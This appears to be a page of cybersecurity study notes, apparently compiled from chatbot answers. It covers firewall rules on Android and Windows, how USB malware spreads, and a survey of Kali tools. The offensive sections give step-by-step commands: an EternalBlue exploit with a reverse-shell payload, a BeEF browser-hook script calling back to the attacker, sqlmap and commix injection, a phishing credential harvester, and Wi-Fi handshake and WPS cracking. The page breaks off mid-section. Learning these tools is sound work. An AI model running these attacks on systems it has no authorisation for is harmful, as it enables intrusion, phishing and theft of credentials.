Kali Linux

https://www.istm.gov.in/home/user_datails/234

Kali Linux?

Kali Linux is a specialized Linux distribution used for ethical hacking, penetration testing, and cybersecurity research.Β 

Other Tools like Kali Linux?

πŸ› οΈ Top OS Like Kali Linux:


Each has its own strengths β€” but Kali and Parrot OS are the most widely used for offensive security.


What is Modus operandi and Security tips and techniques?

πŸ”Ή What is Modus Operandi?

Modus Operandi (MO) is a Latin term that means "method of operation."
In security and crime-related contexts, it refers to:

The specific way or pattern in which a crime or security breach is typically committed.

It includes:

πŸ‘‰ Understanding the MO helps in anticipating, detecting, and preventing future threats.


πŸ”Ή Security Tips and Techniques

Here are common security tips and techniques (especially for cyber and physical security):

πŸ” 1. Password Safety

🌐 2. Internet Safety

πŸ’» 3. Device Protection

πŸ§‘β€πŸ’Ό 4. Social Engineering Awareness

πŸ“ 5. Data Security

🏒 6. Physical Security

πŸ›‘ 7. Incident Reporting

🧠 8. Awareness and Training


How to create own firewall android?

πŸ”§ How to Create Your Own Firewall (Android Focus)

βœ… Option 1: Build Your Own Firewall App for Android (No Root)

You can build a firewall app using Android’s VPNService API, which lets you create a local VPN tunnel and filter traffic.

πŸ› οΈ Tools Needed:

πŸ” What Your App Will Do:

πŸ“š Guide (Steps in Short):


βœ… What is a Rooted Device? (In Simple Terms)

A rooted Android device means:

You have full control over your phone β€” like the "admin" or "owner" of everything inside it.


πŸ§‘β€πŸŒΎ Farmer Example:

Imagine your phone is a tractor.

When you root it, it’s like getting the master key to open up everything:


πŸ”“ Root = Unlocking full access


⚠️ But Be Careful:


So in short:

Rooting = Getting full control of your phone, like becoming the β€œboss” of it.



πŸ§‘β€πŸ’» Option 2: Create Firewall Rules on a Rooted Device (Linux-like iptables)

If your Android is rooted:

Example:

bash

CopyEdit

iptables -A OUTPUT -p tcp --dport 80 -j DROP



🌐 Option 3: Create a Firewall at Network Level (Router / Raspberry Pi)


⚠️ Things to Keep in Mind:


βœ… Summary:

Platform = Way to Build Firewall

Android (no root) = Use VPNService API (Java/Kotlin app)

Android (rooted) = Use iptables

Laptop/Desktop = Use UFW, Windows Firewall, or write custom scripts

Network-wide = Set up a Raspberry Pi or pfSense box




πŸ“± Android Firewall App (No Root Needed)

πŸ”§ Tools Needed:


🧩 Step-by-Step Code (Basic VPNService-based Firewall)

πŸ“ 1. AndroidManifest.xml

xml

CopyEdit

<manifest xmlns:android="http://schemas.android.com/apk/res/android"

Β Β Β Β package="com.example.firewall">


Β Β Β Β <application

Β Β Β Β Β Β Β Β android:allowBackup="true"

Β Β Β Β Β Β Β Β android:label="Firewall"

Β Β Β Β Β Β Β Β android:supportsRtl="true"

Β Β Β Β Β Β Β Β android:theme="@style/Theme.AppCompat.Light.DarkActionBar">

Β Β Β Β Β Β Β Β 

Β Β Β Β Β Β Β Β <service

Β Β Β Β Β Β Β Β Β Β Β Β android:name=".MyVPNService"

Β Β Β Β Β Β Β Β Β Β Β Β android:permission="android.permission.BIND_VPN_SERVICE">

Β Β Β Β Β Β Β Β Β Β Β Β <intent-filter>

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β <action android:name="android.net.VpnService" />

Β Β Β Β Β Β Β Β Β Β Β Β </intent-filter>

Β Β Β Β Β Β Β Β </service>


Β Β Β Β </application>

</manifest>



🧠 2. Create MyVPNService.java

java

CopyEdit

import android.net.VpnService;

import android.os.ParcelFileDescriptor;

import java.io.IOException;


public class MyVPNService extends VpnService {


Β Β Β Β private ParcelFileDescriptor vpnInterface;


Β Β Β Β @Override

Β Β Β Β public void onCreate() {

Β Β Β Β Β Β Β Β super.onCreate();

Β Β Β Β Β Β Β Β startVPN();

Β Β Β Β }


Β Β Β Β private void startVPN() {

Β Β Β Β Β Β Β Β Builder builder = new Builder();


Β Β Β Β Β Β Β Β builder.setSession("MyFirewallVPN")

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β .addAddress("10.0.0.2", 32)Β  // Virtual IP

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β .addRoute("0.0.0.0", 0); Β  Β  // Route all traffic


Β Β Β Β Β Β Β Β try {

Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface = builder.establish();

Β Β Β Β Β Β Β Β } catch (Exception e) {

Β Β Β Β Β Β Β Β Β Β Β Β e.printStackTrace();

Β Β Β Β Β Β Β Β }

Β Β Β Β }


Β Β Β Β @Override

Β Β Β Β public void onDestroy() {

Β Β Β Β Β Β Β Β super.onDestroy();

Β Β Β Β Β Β Β Β try {

Β Β Β Β Β Β Β Β Β Β Β Β if (vpnInterface != null) {

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface.close();

Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β Β vpnInterface = null;

Β Β Β Β Β Β Β Β Β Β Β Β }

Β Β Β Β Β Β Β Β } catch (IOException e) {

Β Β Β Β Β Β Β Β Β Β Β Β e.printStackTrace();

Β Β Β Β Β Β Β Β }

Β Β Β Β }

}



🧩 3. Add Permissions in AndroidManifest.xml

xml

CopyEdit

<uses-permission android:name="android.permission.INTERNET" />



πŸŽ›οΈ 4. Trigger the VPN Service from MainActivity

java

CopyEdit

import android.content.Intent;

import android.net.VpnService;

import android.os.Bundle;

import androidx.appcompat.app.AppCompatActivity;


public class MainActivity extends AppCompatActivity {


Β Β Β Β private static final int VPN_REQUEST_CODE = 0x0F;


Β Β Β Β @Override

Β Β Β Β protected void onCreate(Bundle savedInstanceState) {

Β Β Β Β Β Β Β Β super.onCreate(savedInstanceState);


Β Β Β Β Β Β Β Β Intent intent = VpnService.prepare(this);

Β Β Β Β Β Β Β Β if (intent != null) {

Β Β Β Β Β Β Β Β Β Β Β Β startActivityForResult(intent, VPN_REQUEST_CODE);

Β Β Β Β Β Β Β Β } else {

Β Β Β Β Β Β Β Β Β Β Β Β onActivityResult(VPN_REQUEST_CODE, RESULT_OK, null);

Β Β Β Β Β Β Β Β }

Β Β Β Β }


Β Β Β Β @Override

Β Β Β Β protected void onActivityResult(int requestCode, int resultCode, Intent data) {

Β Β Β Β Β Β Β Β if (requestCode == VPN_REQUEST_CODE && resultCode == RESULT_OK) {

Β Β Β Β Β Β Β Β Β Β Β Β Intent intent = new Intent(this, MyVPNService.class);

Β Β Β Β Β Β Β Β Β Β Β Β startService(intent);

Β Β Β Β Β Β Β Β }

Β Β Β Β Β Β Β Β super.onActivityResult(requestCode, resultCode, data);

Β Β Β Β }

}



βœ… What This Code Does:


⚠️ Next Steps (Advanced):

πŸ‘£ Your Goal:

To create a basic Android firewall app that uses code.


🧰 What You Need First:

βœ… 1. A Computer (Windows or macOS)

That’s where you’ll write the app.

βœ… 2. Android Studio

Android Studio is like the kitchen where you’ll "cook" your app (code, run, test it).


πŸ”½ Step 1: Install Android Studio


πŸ†• Step 2: Create a New Android Project

Now Android Studio will create a basic app project for you. Think of it like the empty pot where you'll add your ingredients (your code).


πŸ“„ Step 3: Where to Paste the Codes I Gave You

You will see folders like:

css

CopyEdit

app >

Β Β Β Β java >

Β Β Β Β Β Β Β Β com.example.myfirewallapp >

Β Β Β Β Β Β Β Β Β Β Β Β MainActivity.java ← (Paste MainActivity code here)


Next:

scss

CopyEdit

Right-click the same folder (com.example...) β†’ New β†’ Java Class β†’ Name it MyVPNService


Now:

πŸ“œ Open AndroidManifest.xml

You’ll find it here:

nginx

CopyEdit

app > manifests > AndroidManifest.xml



▢️ Step 4: Run the App on a Phone or Emulator

βœ… You can either:

Then click the green Play button (▢️) to launch your app.


πŸ§ͺ Step 5: Test the VPN

βœ… Where to Install Android Studio?

πŸ‘‰ Install it on your laptop or PC.
πŸ’» NOT on your Android phone.


πŸ”½ Step-by-step Installation on Laptop:


🎯 What Android Studio Does:


🧩 Summary:

Question - Answer

Where to install Android Studio? - πŸ’» On your laptop

Can I install it on Android phone? - ❌ No, not possible

What do I do after installation? - βœ… Create your app and test it on phone




🟒 What is F-Droid?

F-Droid is like a Play Store β€” but for free and open-source apps only.

βœ… It's a place where you can download Android apps that are:


πŸ› οΈ Where did F-Droid come from?


πŸͺ What’s inside F-Droid?

Apps like:


βœ… Why Use F-Droid?

Feature = F-Droid = Play Store

Ads - ❌ No adsΒ  - βœ… Many apps have ads

Trackers - ❌ No spying - ⚠️ Some apps track you

Source Code - βœ… Open-source - ❌ Not available

Root Tools - βœ… Many available - ❌ Often banned

Free Apps  -  Totally free - ⚠️ Some paid, some free


πŸ”½ How to Install F-Droid?

⚠️ You won’t find F-Droid on the Play Store (Google doesn't allow it!)

βœ… Steps:


🧠 Analogy:

Think of F-Droid as a local organic market β€” everything is clean, open, and safe β€” compared to a big supermarket (Play Store) that sells both healthy and junk stuff with ads everywhere.

🧩 What is iptables?

πŸ‘‰ iptables is a firewall command-line tool used in Linux systems (including Android, because Android is built on Linux!).

It helps you:


πŸ’‘ Think of it like this:

iptables is like a digital traffic policeman.
You write rules like:


πŸ› οΈ Where do you run iptables?

βœ… You run it on your Android phone

(but only if it is rooted ❗)

Not on your laptop.


πŸ“± Tools to run iptables on phone:

πŸ”Ή 1. Termux App (from F-Droid, not Play Store)

πŸ”Ή 2. Root Terminal App


πŸ§ͺ Example Step-by-Step (on rooted phone):

bash

CopyEdit

su


(Your phone will ask: "Grant Root Access?" β†’ tap ALLOW)

bash

CopyEdit

iptables -P OUTPUT DROPΒ  # block all outgoing traffic


or:

bash

CopyEdit

iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT


(Allow traffic only for an app with UID 10123)


⚠️ Remember:


πŸ” Optional Easy Way:

If you're not comfortable typing commands, install AFWall+ and just check/uncheck boxes to allow or block apps.


πŸ’¬ TL;DR:

Question - Answer

What is iptables? - A Linux firewall command system

Where to run it? - On rooted Android phone using apps like Termux

Can I run it on laptop? - ❌ No, not for controlling your phone's internet

Is there an easy way? - βœ… Yes! Use AFWall+ app instead


βœ… What You Can Do on a Rooted Device (Firewall-wise):

πŸ”₯ Option 1: Use iptables to Create Your Own Firewall Rules

This is like writing your own firewall script β€” the same as a Linux computer.

🧰 What You Need:


🧾 Example iptables Commands:

πŸ”’ Block all outgoing internet:

bash

CopyEdit

su

iptables -P OUTPUT DROP


🌐 Allow only browser (say Chrome) to use internet:

First, find Chrome's UID:

bash

CopyEdit

dumpsys package com.android.chrome | grep userId=


Assume it shows UID: 10123

Now allow only Chrome:

bash

CopyEdit

iptables -A OUTPUT -m owner --uid-owner 10123 -j ACCEPT


πŸ›‘ Block WhatsApp from internet:

Find UID of WhatsApp:

bash

CopyEdit

dumpsys package com.whatsapp | grep userId=


Then:

bash

CopyEdit

iptables -A OUTPUT -m owner --uid-owner <WhatsApp_UID> -j DROP



⚠️ Important:


πŸ” Alternative: Use a Firewall App for Rooted Devices

πŸ”Ή AFWall+ (Android Firewall Plus)

πŸ’‘ Tip: After installing AFWall+, grant root access, then simply toggle apps to block/allow internet.


πŸ“Œ Summary:

Option - Tool - Skill Level

Write your own firewall - iptables in Termux -Β  - Intermediate–Advanced

Easy UI method - AFWall+ = Beginner–Friendly


How to create own firewall in Windows?

🧰 What does β€œCreate Own Firewall” mean in Windows?

It means you’ll:


βœ… 3 Ways to Create Your Own Firewall in Windows:


πŸ”Ή Method 1: Use Built-in Windows Defender Firewall

Windows already comes with a powerful firewall, and you can create custom rules in it β€” no need to install anything.

πŸ‘£ Steps to Create Custom Firewall Rules:

Now, you’ll see:


🚫 Example: Block an App from Using Internet

Let’s say you want to block Chrome:

πŸŽ‰ Done! Chrome can no longer access the internet.


πŸ”Ή Method 2: Use PowerShell to Create Firewall Rules

If you love command-line:

powershell

CopyEdit

New-NetFirewallRule -DisplayName "Block Chrome" -Direction Outbound -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" -Action Block


This does the same as above β€” but faster.


πŸ”Ή Method 3: Build Your Own Firewall App (Advanced)

If you’re a developer (or learning):

But this is very advanced and not needed unless you're building a full custom product.


🧠 Summary:

Goal = Method

Block internet for apps = Use Windows Firewall Advanced Settings

Do it with commands = Use PowerShell

Build full custom firewall = Use C#/C++ + WinDivert or WFP (Advanced)


πŸ”Ή Method 1: PowerShell Script (No Software Needed)

Use this if you want to quickly block or allow apps from accessing the internet.


🧾 Code 1: Block an App from Accessing Internet

πŸ” Example: Block Chrome from using the internet

powershell

CopyEdit

New-NetFirewallRule -DisplayName "Block Chrome Outbound" `

Β Β Β Β -Direction Outbound `

Β Β Β Β -Program "C:\Program Files\Google\Chrome\Application\chrome.exe" `

Β Β Β Β -Action Block



🧾 Code 2: Allow Specific App Only (Block All Others)

You can first block everything and then allow specific apps:

powershell

CopyEdit

# Block all outbound traffic (⚠️ Be careful!)

Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Block


# Allow Notepad

New-NetFirewallRule -DisplayName "Allow Notepad" `

Β Β Β Β -Direction Outbound `

Β Β Β Β -Program "C:\Windows\System32\notepad.exe" `

Β Β Β Β -Action Allow


βœ… To undo, run:

powershell

CopyEdit

Set-NetFirewallProfile -Profile Domain,Public,Private -DefaultOutboundAction Allow



πŸ“Œ How to Use This:


πŸ”Ή Method 2: Python Script (Advanced Custom Firewall)

You can also capture and analyze packets using Python + pydivert (a wrapper for WinDivert).

πŸ“¦ Install pydivert:

bash

CopyEdit

pip install pydivert


🐍 Python Example: Block Access to Specific Website (e.g., Facebook)

python

CopyEdit

import pydivert


with pydivert.WinDivert("outbound and ip.DstAddr == 157.240.0.0/16") as w:Β  # Facebook IP Range

Β Β Β Β for packet in w:

Β Β Β Β Β Β Β Β print("Blocked:", packet.dst_addr)

Β Β Β Β Β Β Β Β # Drop the packet = block it (do not re-inject)


This will block outbound traffic to Facebook's IP range.

⚠️ Run as Administrator (script needs admin rights to work).


🧠 Summary:

Task = Tool = Code Type

Block an app (e.g., Chrome) = PowerShell = βœ… Simple & Recommended

Block websites/IPs = Python + pydivert = πŸ”§ Advanced

Custom rule-based blocking = C#/C++ with WinDivert/WFP = πŸ‘¨β€πŸ’» Expert Level


How USB detected onto computer?

🧩 πŸ”Œ What Happens When You Plug an Unknown USB Pen Drive into a Windows PC


βœ… STEP 1: Electrical Detection (Hardware Level)


βœ… STEP 2: Device Enumeration


βœ… STEP 3: File System Mounting

πŸ” This is when you hear the "ding" sound, and the USB becomes visible.


βœ… STEP 4: AutoPlay / AutoRun

⚠️ AutoRun is disabled by default in modern Windows (for security), but older PCs or misconfigured systems may still allow it. That’s how viruses can launch automatically.


βœ… STEP 5: File Explorer Shows the Drive


🦠 Now If a Virus Is Present…

Here’s how a virus might sneak in:


⚠️ STEP 6: AutoRun Attack (If Enabled)

Example autorun.inf content:

ini

CopyEdit

[autorun]

open=malware.exe



⚠️ STEP 7: Manual Trigger (If You Click Something)


πŸ“ Where Does the Virus Go After Entry?

🧬 STEP 8: Virus Copies Itself (Persistence)

It may store itself in:


πŸ‘οΈβ€πŸ—¨οΈ How It Hides Itself:


πŸ›‘ How to Detect It:


πŸ”’ Summary Flow:

pgsql

CopyEdit

Plug USB β†’ Detected by USB controller β†’ Windows loads driver β†’ Mounts file system β†’ AutoRun checked β†’ File Explorer shows drive β†’ Virus may auto-run or be clicked β†’ Virus copies itself to system folders/startup β†’ Tries to hide and run at boot



πŸ›‘οΈ Pro Tips to Stay Safe:


How many commands are there in Kali Linux?

πŸ”’ So, how many commands are there in Kali Linux (for hacking tools)?

Kali Linux includes:

βœ… On average, each tool can have 10–50+ commands or options.

➑️ So, roughly:

600 tools Γ— average 20 commands = 12,000+ possible hacking-related commands

This doesn’t even count the standard Linux commands, which are also used for scripting, networking, and automation.


🧠 Example:



πŸ’£ 1. Metasploit Framework

A big toolkit for finding and exploiting vulnerabilities in a target system.


🧾 Code:

bash

CopyEdit

msfconsole


πŸ‘‰ What it does:
Starts the Metasploit console β€” the main interface where you type all commands.


🧾 Sample Exploit:

bash

CopyEdit

use exploit/windows/smb/ms17_010_eternalblue


πŸ‘‰ What it does:
Loads an exploit that targets a Windows vulnerability called EternalBlue, used in real attacks like WannaCry.


bash

CopyEdit

set RHOSTS <target_ip>


πŸ‘‰ What it does:
Sets the IP address of the victim machine you want to attack.


bash

CopyEdit

set LHOST <your_ip>


πŸ‘‰ What it does:
Sets your own IP address β€” so when the victim is hacked, it knows where to send access back (reverse shell).


bash

CopyEdit

set PAYLOAD windows/meterpreter/reverse_tcp


πŸ‘‰ What it does:
Tells Metasploit what kind of "weapon" to use. In this case: a reverse shell, which gives you control of the victim’s machine.


bash

CopyEdit

run


πŸ‘‰ What it does:
Launches the attack. If successful, you’ll get access to the victim’s computer.


🌐 2. BeEF (Browser Exploitation Framework)

Used to hack/control someone’s browser when they click a malicious link.


🧾 Code:

bash

CopyEdit

beef-xss


πŸ‘‰ What it does:
Starts the BeEF server. You use this to trap browsers that visit your fake web page.


🧾 Hook Example:

html

CopyEdit

<script src="http://your_ip:3000/hook.js"></script>


πŸ‘‰ What it does:
When a victim opens a page with this code, their browser gets hooked β€” meaning, you can now control their browser from your BeEF panel (e.g., pop-ups, steal cookies, redirect, etc.)


πŸ“‘ 3. RouterSploit

Like Metasploit, but made to hack routers and IoT devices (CCTV, smart TVs, etc.)


🧾 Code:

bash

CopyEdit

rsf


πŸ‘‰ What it does:
Starts RouterSploit's console.


bash

CopyEdit

use scanners/autopwn


πŸ‘‰ What it does:
Loads the module that automatically scans routers for known weaknesses.


bash

CopyEdit

set target <router_ip>

run


πŸ‘‰ What it does:
Targets the router at that IP and checks if it’s vulnerable to attacks.


πŸ›’οΈ 4. sqlmap

Tool to hack into databases behind websites using SQL injection.


🧾 Code:

bash

CopyEdit

sqlmap -u "http://target.com/product.php?id=1" --dbs


πŸ‘‰ What it does:

If it works, you can read data like usernames, passwords, etc.


πŸ’‰ 5. Commix

Used for command injection attacks β€” when a web app executes system commands without permission.


🧾 Code:

bash

CopyEdit

commix --url="http://target.com/index.php?name=test" --data="name=test"


πŸ‘‰ What it does:
Tests if you can inject system commands through the "name" field (like running ls, whoami, etc.) on the target's server.


🎭 6. SET (Social Engineering Toolkit)

Used to trick people (phishing) to give up passwords, or click fake websites.


🧾 Code:

bash

CopyEdit

setoolkit


πŸ‘‰ What it does:
Starts the Social Engineering Toolkit, an interactive menu tool.

Then you'd follow this path:

text

CopyEdit

1) Social-Engineering AttacksΒ Β 

2) Website Attack VectorsΒ Β 

3) Credential Harvester Attack Method


It creates a fake login page (like Facebook), and when the victim enters their password β€” you get it.


πŸ” 7. SearchSploit

Finds public exploit code from the Exploit Database (offline).


🧾 Code:

bash

CopyEdit

searchsploit apache struts


πŸ‘‰ What it does:
Searches for exploits related to Apache Struts (a common web app framework).


🧾 To copy an exploit:

bash

CopyEdit

searchsploit -m linux/local/37292.c


πŸ‘‰ What it does:
Copies that exploit code into your working folder so you can compile and use it.


βœ… In Summary (Plain Language):

Tool = What It Does

Metasploit = Launches real system attacks (full control)

BeEF = Controls browser (like remote puppet)

RouterSploit = Hacks routers, cameras, IoT

sqlmap = Steals data from website databases

Commix = Runs system commands through web inputs

SET = Creates fake websites to trick users

SearchSploit = Lets you search and download real exploit codes

WiFi exploitation examples?

🚨 Important Disclaimer:

Use Wi-Fi exploitation tools only on networks you own or have permission to test. Unauthorized use is illegal and unethical.


🧰 Tools for Wi-Fi Exploitation in Kali Linux:


πŸ”§ STEP-BY-STEP WIFI EXPLOITATION CODES


βœ… Step 1: Put Wi-Fi Adapter in Monitor Mode

bash

CopyEdit

sudo airmon-ng start wlan0


πŸ‘‰ What it does: Enables monitor mode on your Wi-Fi card so it can "listen" to all traffic nearby (not just your network).

⚠️ Replace wlan0 with your adapter name if different (iwconfig to check)


βœ… Step 2: Scan Nearby Wi-Fi Networks

bash

CopyEdit

sudo airodump-ng wlan0mon


πŸ‘‰ What it does: Shows nearby networks, BSSIDs (MAC addresses), channels, and client devices.

Note down the BSSID and channel of your target Wi-Fi network.


βœ… Step 3: Target a Specific Network

bash

CopyEdit

sudo airodump-ng --bssid <router_bssid> -c <channel> -w capture wlan0mon


πŸ‘‰ What it does:


βœ… Step 4: Deauthenticate a Client to Capture Handshake

bash

CopyEdit

sudo aireplay-ng --deauth 10 -a <router_bssid> -c <client_mac> wlan0mon


πŸ‘‰ What it does:
Sends fake disconnect signals to the user β€” when they reconnect, you capture the handshake (Wi-Fi password exchange).


βœ… Step 5: Crack the Wi-Fi Password

bash

CopyEdit

sudo aircrack-ng capture-01.cap -w /usr/share/wordlists/rockyou.txt


πŸ‘‰ What it does:
Uses a wordlist (like rockyou.txt) to try different passwords and crack the captured handshake file.


πŸ”„ BONUS: Use Wifite for Automated Attacks

bash

CopyEdit

sudo wifite


πŸ‘‰ What it does:
Scans and attacks Wi-Fi networks automatically using tools above (airodump, aircrack, etc.)


🧠 BONUS TOOL: Reaver (For WPS Attacks)

If the router has WPS enabled, try this:

bash

CopyEdit

sudo wash -i wlan0mon


πŸ‘‰ Shows WPS-enabled routers.

bash

CopyEdit

sudo reaver -i wlan0mon -b <bssid> -c <channel> -vv


πŸ‘‰ Tries to brute-force the WPS PIN and get the Wi-Fi password.


πŸ“¦ Summary of Commands:

Tool = Β Command = What It Does

airmon-ng = airmon-ng start wlan0 = Enable monitor mode

airodump-ng = airodump-ng wlan0mon = Scan Wi-Fi networks

airodump-ng (target) = airodump-ng --bssid BSSID -c CH -w capture wlan0mon = Capture handshake

aireplay-ng = aireplay-ng --deauth 10 -a BSSID -c CLIENT wlan0mon = Force reconnect

aircrack-ng = aircrack-ng capture.cap -w rockyou.txt = Crack password

wifite = wifite = Auto-attack Wi-Fi

reaver = reaver -i wlan0mon -b BSSID -vv = Brute-force WPS

sudo apt update && sudo apt upgrade -y

sudo apt update && sudo apt upgrade -yΒ 


The command sudo apt update && sudo apt upgrade -y is commonly used in Debian-based Linux distributions like Kali Linux to update and upgrade the system. Here's the breakdown:

1. sudo (Super User Do):

2. apt (Advanced Package Tool):

3. update:

4. && (Logical AND Operator):

5. upgrade:

6. -y (Yes to All Prompts):


Complete Workflow:


Cybersecurity Tips & Techniques for Experts

πŸ” Cybersecurity Tips & Techniques for Experts

🧠 1. Defense-in-Depth (Layered Security)


πŸ•΅οΈ 2. Zero Trust Architecture (ZTA)


🧱 3. Endpoint Detection and Response (EDR)


🧰 4. Threat Intelligence Integration


πŸ”’ 5. Secure Configuration & Hardening


🧬 6. Application Security (AppSec)


πŸ’£ 7. Red Team / Blue Team Exercises


πŸ“Š 8. Security Logging & Monitoring


πŸ›‘οΈ 9. Cloud Security Best Practices


πŸ§ͺ 10. Regular Penetration Testing & Vulnerability Management


βš”οΈ Bonus Pro Tips for Experts


Activity: Create a Custom Firewall Rule in Windows

πŸ”₯ Activity: Create a Custom Firewall Rule in Windows

πŸ”Ή Objective: Block a specific application from accessing the internet using Windows Firewall.


βœ… Step-by-Step Instructions:

πŸ”’ Step 1: Open Windows Firewall Settings


πŸ› οΈ Step 2: Create a New Outbound Rule


πŸ“„ Step 3: Choose Rule Type


🚫 Step 4: Block the Connection


🌐 Step 5: Apply the Rule


πŸ“ Step 6: Name the Rule

βœ… Done! That app is now blocked from accessing the internet.


Block IP, USB ports on computers

πŸ”’ Block an IP Address Using Command Line (Command Prompt)


netsh advfirewall firewall add rule name="BlockBadIP" dir=in action=block remoteip=123.123.123.123


Replace 123.123.123.123 with the IP you want to block.


🧼 To Remove the Rule Later:


netsh advfirewall firewall delete rule name="BlockBadIP"



βœ… To Confirm the Rule Was Added:


netsh advfirewall firewall show rule name="BlockBadIP"




🚫 Step 1: Block USB Ports (Prevent USB Storage Devices)

We'll disable the USBSTOR (USB Storage) driver.

πŸ”§ Run this in Command Prompt as Administrator:


reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 4 /f


This sets the USB Storage driver to "disabled" (value 4), so no USB devices will load.


βœ… Step 2: Unblock USB Ports (Enable USB Storage Devices Again)

To re-enable the USB ports:


reg add "HKLM\SYSTEM\CurrentControlSet\Services\USBSTOR" /v Start /t REG_DWORD /d 3 /f


This sets the driver back to "manual" start (value 3), allowing USB devices again.


Blocking IP & USB on Android

πŸ”Œ 1. Blocking USB (Pendrive) Detection on Android

Android devices don’t natively support USB drives unless:

To block or control USB access, you'd have to do one of these:

βœ… If Your Android is Rooted (More power!)

You can:

Example approach:


su

setprop persist.sys.usb.config none


This disables USB connection modes.

Or block mounting using:


chmod 000 /dev/block/sdX Β  # Replace with actual block device for USB


🚫 If Your Android is Not Rooted

Options are limited, but you can:


🌐 2. Blocking or Controlling IP Access on Android

You can either block certain IPs or bypass IP blocking.

πŸ”’ Block IPs:

If rooted:


su

iptables -A OUTPUT -d 192.168.1.100 -j DROP


To block a whole range:


iptables -A OUTPUT -d 192.168.0.0/24 -j DROP


If unrooted, install apps like:

These use VPN-based firewalls to block connections by app or IP.

πŸ•΅οΈβ€β™€οΈ Bypass IP Blocking (If you want access to blocked sites)